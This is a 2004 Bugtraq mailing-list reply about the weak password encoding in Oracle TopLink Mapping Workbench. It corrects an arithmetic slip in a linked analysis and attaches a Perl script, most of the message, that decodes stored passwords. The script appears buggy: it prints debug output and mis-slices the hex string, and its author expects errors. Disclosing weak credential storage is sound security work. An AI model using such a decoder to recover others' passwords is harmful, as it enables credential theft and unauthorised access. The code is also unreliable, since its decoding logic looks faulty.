[33321] in bugtraq

home help back first fref pref prev next nref lref last post

Re: Oracle toplink mapping workbench password algorithm

daemon@ATHENA.MIT.EDU (Martin)
Mon Feb 2 22:21:15 2004

Message-ID: <40180F11.4030601@mail.ptraced.net>
Date: Wed, 28 Jan 2004 16:35:45 -0300
From: Martin <broadcast@mail.ptraced.net>
MIME-Version: 1.0
To: "Mr. Bugtraq" <bugtraq@securityfocus.com>
In-Reply-To: <CBbg4GBjyvFARxLL@peterfinnigan.demon.co.uk>
Content-Type: multipart/mixed;
 boundary="------------080509040200000805020907"

--------------080509040200000805020907
Content-Type: text/plain; charset=us-ascii; format=flowed
Content-Transfer-Encoding: 7bit

Read the link, really interesting. There's a tiny mistake there tho, on
the example. 97 + 112 does not equal 224, no matter what. I was coding a
PERL script to decrypt the passwords, and I took the 'pa' '74E0'
example, since I was a bit lazy to code a "crypter". Well, here's a PERL
script that will decode the password, email me if you can improve it, or
if you find any errors (Im pretty sure it has, it's pretty ugly).


--------------080509040200000805020907
Content-Type: application/x-perl;
 name="oracletest.pl"
Content-Transfer-Encoding: 7bit
Content-Disposition: inline;
 filename="oracletest.pl"

#!/usr/bin/perl
#Decrypt Oracle Toplink Mapping WorkBench passwords.
#Author: Martin

$string = "A7FCAA504BA7E4FC";

sub usage {
	print " Usage: $0 <password to decrypt>\n";
	}

if ($#ARGV != 0) {
	usage();
	}

else {  
	$encrypted = $ARGV[0];
	$encrypted =~ s/$string/ /;
	$chars = length($encrypted);
	$enc2 = substr($encrypted,0,2);	
	$encrypted = substr($encrypted,2,length($encrypted));
	$i = 0;
	while (($chars / 2) >= $i + 1) {
		print $i;
		$int = hex($enc2);
		if (($i%2) == 1) { $result .= chr($int - ( ($i + 1 )/3 ) - 112); }
		else {  $result .= chr($int - 4 + $i); }		
		$enc2 = substr($encrypted,0,length($encrypted) - 1);
        	$encrypted = substr($encrypted,2,length($encrypted));
		$i++;	
		}
	print "$result\n";	
	}



--------------080509040200000805020907--

home help back first fref pref prev next nref lref last post